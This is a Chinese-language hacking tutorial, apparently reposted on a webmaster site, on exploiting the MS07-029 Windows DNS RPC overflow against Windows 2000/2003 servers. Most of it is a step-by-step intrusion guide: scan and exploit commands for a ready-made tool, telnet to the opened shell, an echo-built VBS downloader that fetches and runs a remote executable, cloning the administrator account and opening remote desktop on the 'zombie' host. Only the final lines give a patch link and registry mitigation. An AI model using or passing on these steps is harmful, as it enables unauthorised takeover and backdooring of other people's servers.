前言:
MS07-029,Windows 域名系統(tǒng) (DNS) 服務(wù)器服務(wù)的遠(yuǎn)程過程調(diào)用 (RPC) 管理接口中存在基于堆棧的緩沖區(qū)溢出。漏洞的前提是沒打補(bǔ)丁,開啟DNS服務(wù)的所有版本W(wǎng)INDOWS 2000 Server和WINDOWS 2003 Server。 今天,就讓我?guī)ьI(lǐng)各路英豪,踏上DNS EXP之路。 我們先來看看所用工具的界面: ![]() 這就是傳說中的利用工具,可以通殺2000SEVER,2003SEVER系統(tǒng),另外還具備了掃描功能! 先用它來對主機(jī)進(jìn)行掃描: 在我們的命令行下輸入:“dns –s 目標(biāo)IP地址” ![]() 稍等片刻,開放的端口以及操作系統(tǒng)以出現(xiàn)在我們面前,如果出現(xiàn)了如上圖所顯示的“1029:Vulnerability”那么恭喜你,你馬上就會成功得到這臺主機(jī)的權(quán)限了 上圖意思就是1029端口存在漏洞。 現(xiàn)在我們來最關(guān)鍵的步驟――溢出: 在命令行內(nèi)輸入 dns -2003chs *.*.93.189 1029 其中-2003ch的意思是操作系統(tǒng)的型號,-2003chs即簡體中文版的2003系統(tǒng), 如果是2000的系統(tǒng)就使用“-2000all”參數(shù),*.*.93.189就是我們的目標(biāo)IP地址,1029就是剛才掃描出存在漏洞的端口”。 ![]() 出現(xiàn)“Attack sent ,check port 1100”字樣,說明已經(jīng)打開了目標(biāo)地址的1100端口,我們TELNET上去:TELNET *.*.93.189 1100 ![]() 我們現(xiàn)在已經(jīng)成功的入侵了對方的電腦,并且得到了管理員的權(quán)限。 下面我給大家介紹一下如何在肉雞上面開3389, 在命令行里輸入 @echo with wscript:if .arguments.count^ tony.vbs @echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> tony.vbs @echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:" web.status:.quit >> tony.vbs @echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> tony.vbs 大概的意思就是在命令行創(chuàng)立一個用來下載的VBS腳本tony.vbs 然后把開3389的工具上傳到你的個人空間, 我這里用的是火狐開3389的工具,在命令行里輸入 cscript tony.vbs http://你空間地址/wrsky.exe c:\wrsky.exe ![]() “wrsky.exe -c”可以克隆當(dāng)前管理員帳號 再輸入“c:\wrsky.exe -o 3551” ![]() 意思就是打開對方的遠(yuǎn)程桌面服務(wù),并且使用3551端口。 用“wrsky.exe -k”可以檢查3389是否開啟,開啟以后輸入“wrsky.exe -r”,對方的電腦就自動重啟以后就可以連接上去了。 在運(yùn)行里輸入"mstsc",登陸上去。 ![]() 那熟悉而又親切的畫面出現(xiàn)在我們面前了。 如果是2K的系統(tǒng),還有一個更加傻瓜化的工具open3389,直接運(yùn)行就可以了,不需要任何參數(shù),不過對方電腦會馬上重啟。 另外我還放了其他兩個DNS利用工具和一篇ZWELL的精華文章在光盤里,有興趣的朋友可以自己研究。 這個漏洞的危害是是分巨大的,目前利用DNS服務(wù)RPC漏洞傳播的蠕蟲病毒VanBot已經(jīng)出現(xiàn),變種已經(jīng)開始瘋狂傳播。 WIN 2K或2003的朋友請趕快下載補(bǔ)丁 http://www.microsoft.com/china/technet/security/bulletin/ms07-029.mspx 或者打開記事本,輸入: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters] "RpcProtocol"=dword:00000004 保存為擴(kuò)展名為 .REG 的文件,雙擊導(dǎo)入,再重新啟動 DNS 服務(wù)即可。 |
免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識,文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請勿用于商業(yè)用途,如果損害了您的權(quán)利,請聯(lián)系我們及時修正或刪除。謝謝!
始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級,為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!
掃一掃,關(guān)注站長網(wǎng)微信